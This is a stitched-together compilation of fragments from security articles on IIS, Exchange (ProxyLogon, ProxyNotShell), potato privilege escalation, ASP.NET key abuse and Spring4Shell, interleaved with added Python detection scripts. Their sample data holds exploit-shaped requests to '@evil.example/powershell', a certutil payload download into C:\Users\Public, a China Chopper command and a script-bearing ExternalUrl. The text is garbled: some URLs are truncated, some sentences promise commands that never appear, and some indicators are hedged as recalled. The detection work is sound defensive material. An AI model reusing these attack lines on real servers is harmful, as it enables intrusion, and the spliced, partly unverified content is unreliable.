Further investigation shows that only about 60,000 public-facing IIS 6.0 servers have WebDAV enabled and accept the WebDAV PROPFIND method that is necessary for successful exploitation, writes infosec researcher Iraklis Mathiopoulos, who cautioned that the figure is a rough calculation.
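The check behind that count, as an added example that is not from the article: given a raw HTTP OPTIONS response, decide whether the host identifies as IIS 6.0 and advertises PROPFIND. The two responses below are constructed for the example; `probe()` shows how to obtain a real one but is not exercised offline. Header semantics follow RFC 7231 (Allow) and RFC 4918 (DAV); the `Public` header is the older IIS/WebDAV equivalent of Allow.

```python
"""Decide from an OPTIONS response whether an IIS 6.0 host advertises WebDAV PROPFIND.

Added example, not code from the original article. Sample responses are constructed.
"""
import http.client
from typing import Dict, List, Set


def parse_headers(raw_response: str) -> Dict[str, List[str]]:
    """Return lower-cased header name -> list of values (repeated headers preserved)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def advertised_methods(headers: Dict[str, List[str]]) -> Set[str]:
    """Union of the methods listed in Allow (RFC 7231) and Public (IIS/WebDAV) headers."""
    methods: Set[str] = set()
    for name in ("allow", "public"):
        for value in headers.get(name, []):
            methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods


def assess_webdav(raw_response: str) -> dict:
    """Summarise whether the response matches 'IIS 6.0 with PROPFIND advertised'."""
    headers = parse_headers(raw_response)
    methods = advertised_methods(headers)
    server = headers.get("server", [""])[0]
    iis6 = server.startswith("Microsoft-IIS/6.")
    propfind = "PROPFIND" in methods
    return {
        "server": server,
        "iis6": iis6,
        "dav_header": "dav" in headers,   # 'DAV: 1, 2' means the WebDAV extension answered
        "propfind": propfind,
        "matches_criteria": iis6 and propfind,
        "methods": sorted(methods),
    }


def probe(host: str, path: str = "/", port: int = 80, timeout: float = 5.0) -> dict:
    """Send a real OPTIONS request and assess the reply (network access required)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    raw = "HTTP/1.1 %d %s\r\n" % (resp.status, resp.reason)
    raw += "".join("%s: %s\r\n" % (k, v) for k, v in resp.getheaders()) + "\r\n"
    conn.close()
    return assess_webdav(raw)


# Constructed sample responses (not captured from any real host).
IIS6_WEBDAV_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: MS-FP/4.0,DAV\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, "
    "DELETE, COPY, MOVE, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n\r\n"
)

IIS6_NO_WEBDAV_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for label, raw in (("webdav", IIS6_WEBDAV_RESPONSE), ("plain", IIS6_NO_WEBDAV_RESPONSE)):
        print(label, assess_webdav(raw))
```

An advertised method is not proof that the WebDAV handler actually processes PROPFIND (a reverse proxy or a stale banner can misreport), so a positive here is a candidate for the count, not a confirmed vulnerable host.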
Three of the top 15 routinely exploited vulnerabilities were also routinely exploited in 2020: CVE-2020-1472, CVE-2018-13379, and CVE-2019-11510. Their continued exploitation indicates that many organizations fail to patch software in a timely manner and remain vulnerable to malicious cyber actors.
Guide to IIS Exploitation
Microsoft has yet to release a patch for these vulnerabilities. In the meantime, it has provided mitigations that rely on a URL Rewrite rule to identify and block exploitation attempts, as well as on disabling remote PowerShell access for non-administrators.
GTSC provided the same guidance in its blog. If you suspect you may have been targeted and retain IIS logs, GTSC recommends running the following PowerShell command to search for evidence of attempted exploitation of your Exchange servers:
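A way to do both of the things described above, as an added example that is neither the GTSC command nor Microsoft's rule: `blocked_by_rewrite` applies the rewrite condition (both `autodiscover` and `powershell` present in the URL-decoded request URI) to a single URI, and `hunt_autodiscover_powershell` runs the same test over IIS W3C log lines. The log lines are constructed; the lookahead pattern follows the shape of Microsoft's updated guidance and should be checked against the current advisory before it is relied on.

```python
"""Hunt IIS W3C logs for ProxyNotShell/ProxyShell-style Autodiscover requests.

Added example, not the GTSC or Microsoft command. Log lines below are constructed.
"""
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Both markers must appear, in any order, anywhere in the decoded URI.
SUSPICIOUS_URI = re.compile(r"(?=.*autodiscover)(?=.*powershell)", re.IGNORECASE | re.DOTALL)


def fully_decode(uri: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded) so %40, %2540, ... all become '@'."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def blocked_by_rewrite(request_uri: str) -> bool:
    """Would a rewrite condition evaluated on the decoded REQUEST_URI block this request?"""
    return SUSPICIOUS_URI.match(fully_decode(request_uri)) is not None


def parse_iis_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C extended log lines, taking column names from the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def hunt_autodiscover_powershell(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return log records whose decoded stem+query matches the exploit shape."""
    hits: List[Dict[str, str]] = []
    for rec in parse_iis_w3c(lines):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        uri = stem if query == "-" else stem + "?" + query
        if blocked_by_rewrite(uri):
            status = rec.get("sc-status", "")
            hits.append({
                "time": rec.get("date", "") + " " + rec.get("time", ""),
                "client": rec.get("c-ip", ""),
                "status": status,
                "uri": fully_decode(uri),
                # a 200 on this path is the success signature; anything else is an attempt
                "verdict": "likely successful" if status == "200" else "attempt",
            })
    return hits


# Constructed sample log (IIS 10 W3C format); client addresses are documentation ranges.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2022-09-30 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2022-09-30 10:00:01 10.0.0.5 GET /owa/ - 443 - 203.0.113.10 Mozilla/5.0 - 200 0 0 15
2022-09-30 10:00:02 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell?X-Rps-CAT=xyz 443 - 198.51.100.7 Mozilla/5.0 - 200 0 0 340
2022-09-30 10:00:03 10.0.0.5 POST /autodiscover/autodiscover.json %40evil.example/PowerShell 443 - 198.51.100.7 python-requests/2.28 - 401 1 0 12
2022-09-30 10:00:04 10.0.0.5 GET /autodiscover/autodiscover.xml - 443 DOMAIN\\alice 10.0.0.20 Microsoft-Office/16.0 - 200 0 0 8
"""

if __name__ == "__main__":
    for hit in hunt_autodiscover_powershell(SAMPLE_LOG.splitlines()):
        print(hit)
```

Decoding before matching is the point: a pattern that looks for a literal `@` in the raw URI is sidestepped by `%40` (or a doubly encoded `%2540`), and IIS logs the query string as the client sent it.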
Cortex XDR customers can search for signs of exploitation by employing the queries included in the following section of this brief. The queries look for certutil connections to public IPs, DLL and EXE writes to C:\Users\Public\, China Chopper web shell activity, and the addition of suspicious files to Exchange directories.
The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit these CVEs across our customers, using Cortex XDR and the XQL queries below. Cortex XDR customers can also use these XQL queries to search for signs of exploitation.
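Plain-Python equivalents of the four hunts listed above, as an added example; these are not Palo Alto's XQL queries, and the event field names (`type`, `process`, `parent`, `cmdline`, `remote_ip`, `path`) are my own and must be mapped onto whatever telemetry schema you have. The events are constructed. The `echo [S]` / `echo [E]` markers are the well-known China Chopper command-framing signature; the Exchange directory list is an assumption limited to the web-facing paths.

```python
"""Endpoint-telemetry checks mirroring the four hunts described above.

Added example, not Palo Alto's XQL queries. Events below are constructed.
"""
import ipaddress
import re
from typing import Dict, List

CHOPPER_MARKERS = re.compile(r"echo \[S\].*echo \[E\]", re.IGNORECASE)
WEB_WORKER = "w3wp.exe"
PUBLIC_DIR = "c:\\users\\public\\"
# Assumed: web-facing Exchange paths where dropped .aspx/.ashx/.dll files are suspicious.
EXCHANGE_WEB_DIRS = ("\\frontend\\httpproxy\\", "\\inetpub\\wwwroot\\aspnet_client\\")
# 'Internal' means RFC 1918, loopback and link-local; add your own public ranges here.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10")]


def is_public_ip(ip: str) -> bool:
    """True for any address outside the internal ranges above (invalid strings are False)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def triage(events: List[Dict[str, str]]) -> Dict[str, List[Dict[str, str]]]:
    """Bucket events into the four indicator classes; an event may land in several."""
    out: Dict[str, List[Dict[str, str]]] = {
        "certutil_public": [], "public_dir_binary": [], "china_chopper": [], "exchange_dir_file": []}
    for e in events:
        kind = e.get("type", "")
        proc = e.get("process", "").lower()
        path = e.get("path", "").lower()
        if kind == "network" and proc == "certutil.exe" and is_public_ip(e.get("remote_ip", "")):
            out["certutil_public"].append(e)
        if kind == "file_write" and path.startswith(PUBLIC_DIR) and path.endswith((".dll", ".exe")):
            out["public_dir_binary"].append(e)
        if (kind == "process" and proc == "cmd.exe" and e.get("parent", "").lower() == WEB_WORKER
                and CHOPPER_MARKERS.search(e.get("cmdline", ""))):
            out["china_chopper"].append(e)
        if (kind == "file_write" and any(d in path for d in EXCHANGE_WEB_DIRS)
                and path.endswith((".aspx", ".ashx", ".dll"))):
            out["exchange_dir_file"].append(e)
    return out


# Constructed sample telemetry; 198.51.100.0/24 is a documentation range standing in for "public".
SAMPLE_EVENTS = [
    {"type": "network", "process": "certutil.exe", "remote_ip": "198.51.100.20",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.20/a.dll C:\\Users\\Public\\a.dll"},
    {"type": "network", "process": "certutil.exe", "remote_ip": "10.0.0.9",
     "cmdline": "certutil -urlcache -split -f http://10.0.0.9/ok.txt"},
    {"type": "file_write", "process": "certutil.exe", "path": "C:\\Users\\Public\\a.dll"},
    {"type": "file_write", "process": "winword.exe", "path": "C:\\Users\\Public\\notes.txt"},
    {"type": "process", "process": "cmd.exe", "parent": "w3wp.exe",
     "cmdline": 'cmd /c cd /d "C:\\inetpub\\wwwroot"&whoami&echo [S]&cd&echo [E]'},
    {"type": "process", "process": "cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd /c echo [S]&echo [E]"},
    {"type": "file_write", "process": "w3wp.exe",
     "path": "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\x.aspx"},
    {"type": "file_write", "process": "w3wp.exe",
     "path": "C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Logging\\HttpProxy\\Owa\\x.log"},
]

if __name__ == "__main__":
    for bucket, hits in triage(SAMPLE_EVENTS).items():
        print(bucket, len(hits))
```

The certutil check keys on the destination rather than the command line because the `-urlcache` download is only one of several ways the binary is abused; expect benign hits in environments that legitimately fetch certificates from the internet, and triage on the parent process.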
Along with a complete breakdown of the newly discovered families, our new paper, Anatomy of native IIS malware, provides a comprehensive guide to help fellow security researchers and defenders detect, dissect and mitigate this class of server-side threats. In this blogpost, we summarize the findings of the white paper.
While IIS server threats are not limited to native IIS malware, we believe this paper will be a helpful starting point for defenders to understand, identify and remove IIS threats, and a guide for fellow researchers to reverse engineer this class of threats and understand their common tactics, techniques and procedures.
Hot, Rotten, Lonely, Juicy, Rogue, Sweet, Generic potatoes. There are a lot of different potatoes used to escalate privileges from Windows service accounts to NT AUTHORITY\SYSTEM. But what are the differences? When should I use each one? Do they still work? This post is a summary of each kind of potato, when to use it, and how to achieve successful exploitation.
Checking other logs, they saw that the attacker could execute commands on the attacked system. The version number of these Exchange servers showed that the latest update had already been installed, so exploitation via the ProxyShell vulnerabilities could be ruled out.
The easy exploitation mechanism became publicly known after Alvaro Muñoz and Oleksandr Mirosh published their gadgets at Black Hat 2017 [26]. It was then possible to use the YSoSerial.Net project [12] to create LosFormatter payloads.
In the first article in the series, we will take a brief look at the MS Exchange server architecture and then move on to the most relevant topic for everyone: detecting the exploitation of ProxyLogon. We will show how to use standard operating system events and Exchange logs to detect ProxyLogon, both in real time, using proactive threat hunting approaches, and retrospectively, for attacks that have already happened.
Let us take a closer look at the ProxyLogon vulnerability chain. CVE-2021-26857 is not actually part of this chain: it leads to code execution on the server on its own and does not require other vulnerabilities to be exploited beforehand. CVE-2021-26857 is an insecure deserialisation flaw in the Unified Messaging service, and exploiting it requires the Unified Messaging role to be installed and configured on the Exchange server. As this role is rarely used, exploitation of this vulnerability has rarely been reported. Instead, attackers exploit the chain of CVE-2021-26855, CVE-2021-26858 and CVE-2021-27065, which also yields remote arbitrary code execution on the mail server but is easier to exploit.
Successful exploitation of CVE-2021-27065 allows a malicious file to be uploaded to an Exchange server through the ECP interface, which can then be used as a web shell. Exploiting it requires prior authentication, which the SSRF vulnerability CVE-2021-26855 provides. Let us take a closer look at the exploitation of CVE-2021-27065.
CVE-2021-26858 also allows an arbitrary file to be written to an Exchange server, but it likewise requires prior authentication, so it too is chained with the SSRF vulnerability CVE-2021-26855.
There are no publicly available PoCs or other sources detailing its exploitation. Nevertheless, Microsoft has reported how this activity can be detected. To do so, we implement the following rule using events from the OAB Generator service:
Even if the servers are already patched, it is worth checking them for signs of ProxyLogon exploitation and remediating the consequences if needed. This is quite easy to do with the standard operating system and Exchange server log events at hand.
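A post-patch hunt over those logs, as an added example and not the article's own rule: one check per CVE in the chain, run over constructed samples of the HttpProxy CSV logs (CVE-2021-26855), the ECP server logs (CVE-2021-27065), the OABGenerator logs (CVE-2021-26858) and Application event records from Unified Messaging (CVE-2021-26857). The indicator strings and log locations are the ones from Microsoft's published HAFNIUM hunting guidance as I recall them; verify them against the current advisory. The sample column sets are reduced and the message text after each marker is constructed.

```python
"""Per-CVE ProxyLogon indicators over Exchange and Windows logs.

Added example, not the article's rule. Samples are constructed; feed the functions the
contents of the real files under <ExchangeInstallPath>\\Logging\\ to use them.
"""
import csv
import io
import re
from typing import Dict, List

ANCHOR_SSRF = re.compile(r"^ServerInfo~.*/")        # PowerShell -like 'ServerInfo~*/*'
ECP_SET_VDIR = re.compile(r"Set-.+VirtualDirectory")
OAB_MARKER = "Download failed and temporary file"
OAB_TEMP_DIR = "\\clientaccess\\oab\\temp\\"        # the one legitimate drop location


def parse_exchange_csv(text: str) -> List[Dict[str, str]]:
    """Exchange CSV logs: '#'-prefixed preamble, column names on '#Fields:' (or the first
    plain row), and the header line may be repeated as an ordinary row."""
    header, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            header = line[len("#Fields:"):].strip()
        elif line.startswith("#"):
            continue
        elif header is None:
            header = line
        elif line != header:
            rows.append(line)
    if header is None:
        return []
    return list(csv.DictReader(io.StringIO("\n".join([header] + rows))))


def ssrf_hits(httpproxy_csv: str) -> List[Dict[str, str]]:
    """CVE-2021-26855: unauthenticated requests whose AnchorMailbox was rewritten to ServerInfo~.../..."""
    return [r for r in parse_exchange_csv(httpproxy_csv)
            if r.get("AuthenticatedUser", "") == "" and ANCHOR_SSRF.match(r.get("AnchorMailbox", ""))]


def ecp_hits(ecp_log: str) -> List[str]:
    """CVE-2021-27065: virtual-directory changes made through ECP (the shell arrives via ExternalUrl)."""
    return [line for line in ecp_log.splitlines() if ECP_SET_VDIR.search(line)]


def oab_hits(oab_log: str) -> List[Dict[str, object]]:
    """CVE-2021-26858: OABGenerator temporary-file writes outside OAB\\Temp\\ are suspicious."""
    hits: List[Dict[str, object]] = []
    for line in oab_log.splitlines():
        if OAB_MARKER not in line:
            continue
        tail = line.split(OAB_MARKER, 1)[1].strip()
        hits.append({"line": line, "target": tail, "suspicious": OAB_TEMP_DIR not in tail.lower()})
    return hits


def um_hits(app_events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """CVE-2021-26857: Application-log errors from Unified Messaging carrying an InvalidCastException."""
    return [e for e in app_events
            if e.get("source") == "MSExchange Unified Messaging" and e.get("level") == "Error"
            and "System.InvalidCastException" in e.get("message", "")]


def hunt_proxylogon(httpproxy_csv: str, ecp_log: str, oab_log: str,
                    app_events: List[Dict[str, str]]) -> Dict[str, list]:
    return {"cve-2021-26855": ssrf_hits(httpproxy_csv), "cve-2021-27065": ecp_hits(ecp_log),
            "cve-2021-26858": oab_hits(oab_log), "cve-2021-26857": um_hits(app_events)}


# Constructed samples with reduced column sets; real HttpProxy logs have many more columns.
HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Version: 15.01.2242.004
#Log-type: HttpProxy Logs
#Date: 2021-03-03T00:00:00.000Z
#Fields: DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
DateTime,RequestId,ClientIpAddress,UrlStem,AuthenticatedUser,AnchorMailbox,HttpStatus
2021-03-03T01:02:03.456Z,1,10.0.0.20,/owa/,DOMAIN\\alice,SMTP:alice@corp.example,200
2021-03-03T01:02:09.111Z,2,203.0.113.10,/owa/auth/x.js,,ServerInfo~a]@EXCH01.corp.example:444/autodiscover/autodiscover.xml,200
2021-03-03T01:02:10.222Z,3,203.0.113.10,/ecp/y.js,,ServerInfo~a]@EXCH01.corp.example:444/ecp/DDI/DDIService.svc/SetObject,200
"""
ECP_SERVER_LOG = """2021-03-03T01:02:11.333Z,EXCH01,Get-OabVirtualDirectory,DOMAIN\\admin,OK
2021-03-03T01:02:12.444Z,EXCH01,Set-OabVirtualDirectory,,ExternalUrl=http://o/<script language="JScript" runat="server">...</script>
"""
OABGENERATOR_LOG = """2021-03-03T01:02:13.555Z,EXCH01,Download failed and temporary file C:\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp\\a1b2.tmp was deleted
2021-03-03T01:02:14.666Z,EXCH01,Download failed and temporary file C:\\inetpub\\wwwroot\\aspnet_client\\shell.aspx was deleted
"""
APP_EVENTS = [
    {"source": "MSExchange Unified Messaging", "level": "Error",
     "message": "Unhandled exception in UM worker process: System.InvalidCastException: Unable to cast object"},
    {"source": "MSExchange Unified Messaging", "level": "Information", "message": "UM service started."},
]

if __name__ == "__main__":
    for cve, hits in hunt_proxylogon(HTTPPROXY_LOG, ECP_SERVER_LOG, OABGENERATOR_LOG, APP_EVENTS).items():
        print(cve, len(hits))
```

The SSRF check deliberately requires an empty `AuthenticatedUser` together with the rewritten anchor: an authenticated `ServerInfo~` anchor can be legitimate back-end proxying, while an unauthenticated one is the exploit's footprint.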
This guide only addresses the investigation and mitigation of incidents involving Squirrelwaffle detected on the network. If additional internal lateral movement is detected as a result of unmitigated web shells or other exploitation of the ProxyLogon or ProxyShell vulnerabilities, we recommend a full Incident Response action.
The queries and commands referenced in the guide are some of the methods used by the Sophos Rapid Response team during incident engagements. They are recommendations only, there will be other ways of accomplishing each task.
Patching Exchange will protect it from any further attempts to exploit ProxyShell. However, if it has already been exploited, malware may still exist on the server and provide an attacker with remote access. The next step is to look for signs of previous exploitation of Exchange.
The results show Mailbox Export requests still in the queue, as well as lingering unauthorized Import Export role assignments, which can allow web shells previously removed after ProxyShell and ProxyLogon exploitation to be recreated.
Picus Labs added new attack simulations for ProxyNotShell exploitation to the Picus Threat Library. In this blog, we explain the CVE-2022-41040 and CVE-2022-41082 vulnerabilities in detail.
Security professionals discovered these vulnerabilities after their successful exploitation in the wild. Log data shows that adversaries used the same request format in their exploit attempts as in the 2021 ProxyShell exploitation.
We also strongly suggest simulating ProxyNotShell attacks to test the effectiveness of your security controls against vulnerability exploitation attacks using the Picus Complete Security Validation Platform. You can test your defenses against ProxyShell, Log4Shell, and hundreds of other vulnerabilities within minutes with a 14-day free trial of the Picus Platform.
Moreover, the Picus Threat Library contains 150+ threats comprising 1500+ web application and vulnerability exploitation attacks, in addition to 3500+ endpoint, malware, email and data exfiltration threats as of today.
A patch for CVE-2022-37958 was originally released by Microsoft in September 2022 and remains the supported and recommended solution, despite recent findings by IBM Security X-Force and reclassification by Microsoft: -guide/vulnerability/CVE-2022-37958
On Tuesday evening (UTC), a proof-of-concept (PoC) video surfaced on Twitter ( =20&t=Bwn3jV5oeB4kqamoFxptKQ) from an X-Force security researcher, showing what appears to be successful exploitation of CVE-2022-37958 against a Windows 10 system, causing a crash of the LSA service.
The CFC is creating a threat hunt campaign designed to identify successful exploitation of this vulnerability, using internal queries and methodology resourced from Incident Response engagements where similar activity was observed.
Note: For my own sanity, I have intentionally decided to omit references to ASP.NET 5 (or ASP.NET Core 1.0, or whatever the heck you want to call it). It is just too dramatically different, and if anything, it probably makes sense to write a whole other guide for it later. From this point forward, we are only talking about .NET 4.x and below.
The goal of this post is to provide a resource for pentesters covering multiple aspects of the practical exploitation of ASP.NET cryptography. I want to highlight the increased risk that ASP.NET applications face due to immutable design characteristics of the platform relating to cryptographic functionality.
These techniques are all considered post-exploitation techniques. That is to say, they require some pre-existing violation of the security of an ASP.NET application, whether that is an arbitrary file read, a pre-existing remote code execution (RCE) vulnerability, a public information leak, or even the compromise of a totally separate application.
This short-circuits all of the complicated inner machinery being used to convert the basekey stored in the registry to the effective key and greatly simplifies the process. While incredibly handy, this does assume that you are in the post-exploitation context and therefore already have compromised the server and have access to add .aspx files.
The aspnet_regiis utility (located in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\) can be used to encrypt or decrypt sections of the web.config. Again, this is only useful in a post-exploitation scenario where you already have local admin access on the server.
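What a pentester actually checks once a web.config is in hand, as an added example that is not from the original post: read the `<machineKey>` and `<pages>` elements wherever they sit under `<configuration>` (including `<location>` blocks) and report whether the keys are explicit and therefore usable offline, whether the section is protected and has to be decrypted on the host with aspnet_regiis, and whether ViewState MAC checking is off. The defaults in the comments are the .NET Framework 4.5+ defaults as I recall them; confirm them against Microsoft's machineKey documentation. The three configs and their key values are constructed.

```python
"""Triage a recovered web.config: can ViewState or forms-auth tokens be forged?

Added example, not from the original post. Sample configs and key values are constructed.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

AUTO = "autogenerate"
WEAK_VALIDATION = ("md5", "sha1", "3des")
WEAK_DECRYPTION = ("des", "3des")


def audit_machine_key(web_config_xml: str) -> Dict[str, object]:
    """Return flags plus human-readable findings for the machineKey/pages settings."""
    root = ET.fromstring(web_config_xml)
    findings: List[str] = []
    report: Dict[str, object] = {
        "validation_key_explicit": False, "decryption_key_explicit": False,
        "encrypted_section": False, "viewstate_mac_disabled": False, "findings": findings}
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        findings.append("no <machineKey>: keys are auto-generated on the server, so forging "
                        "tokens needs code execution there rather than a file read")
    elif mk.get("configProtectionProvider"):
        report["encrypted_section"] = True
        findings.append("machineKey protected by %s: decrypt on the host with aspnet_regiis -pdf "
                        "(local admin / DPAPI access required)" % mk.get("configProtectionProvider"))
    else:
        # Defaults when the attribute is absent: AutoGenerate,IsolateApps for both keys,
        # validation=HMACSHA256, decryption=Auto (AES).
        vkey = mk.get("validationKey", "AutoGenerate,IsolateApps")
        dkey = mk.get("decryptionKey", "AutoGenerate,IsolateApps")
        if AUTO not in vkey.lower():
            report["validation_key_explicit"] = True
            findings.append("explicit validationKey: ViewState MACs can be computed offline")
        if AUTO not in dkey.lower():
            report["decryption_key_explicit"] = True
            findings.append("explicit decryptionKey: encrypted ViewState and forms-auth tickets "
                            "can be decrypted and re-encrypted offline")
        validation = mk.get("validation", "HMACSHA256").lower()
        decryption = mk.get("decryption", "Auto").lower()
        if validation in WEAK_VALIDATION:
            findings.append("weak validation algorithm: %s" % validation)
        if decryption in WEAK_DECRYPTION:
            findings.append("weak decryption algorithm: %s" % decryption)
        if mk.get("compatibilityMode", "").lower() == "framework20sp1":
            findings.append("compatibilityMode=Framework20SP1: legacy MAC scheme in use")
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            report["viewstate_mac_disabled"] = True
            findings.append("enableViewStateMac=false: ViewState is accepted unsigned, so a "
                            "deserialization payload needs no key at all")
    return report


# Constructed configs; the hex keys are placeholders, not real key material.
EXPLICIT_KEYS_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                validation="SHA1" decryption="3DES" />
  </system.web>
</configuration>
"""
ENCRYPTED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey configProtectionProvider="RsaProtectedConfigurationProvider">
      <EncryptedData xmlns="http://www.w3.org/2001/04/xmlenc#">...</EncryptedData>
    </machineKey>
  </system.web>
</configuration>
"""
MAC_DISABLED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <location path="legacy">
    <system.web>
      <pages enableViewStateMac="false" />
    </system.web>
  </location>
</configuration>
"""

if __name__ == "__main__":
    for cfg in (EXPLICIT_KEYS_CONFIG, ENCRYPTED_CONFIG, MAC_DISABLED_CONFIG):
        print(audit_machine_key(cfg))
```

An explicit key pair is the case the rest of this post builds on; the protected-section case is where aspnet_regiis comes in, and the auto-generated case is the one where a file read alone does not get you the keys.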
According to the Praetorian post confirming the presence of an RCE in Spring Core, the currently recommended approach is to patch DataBinder by adding a blacklist of the vulnerable field patterns required for exploitation.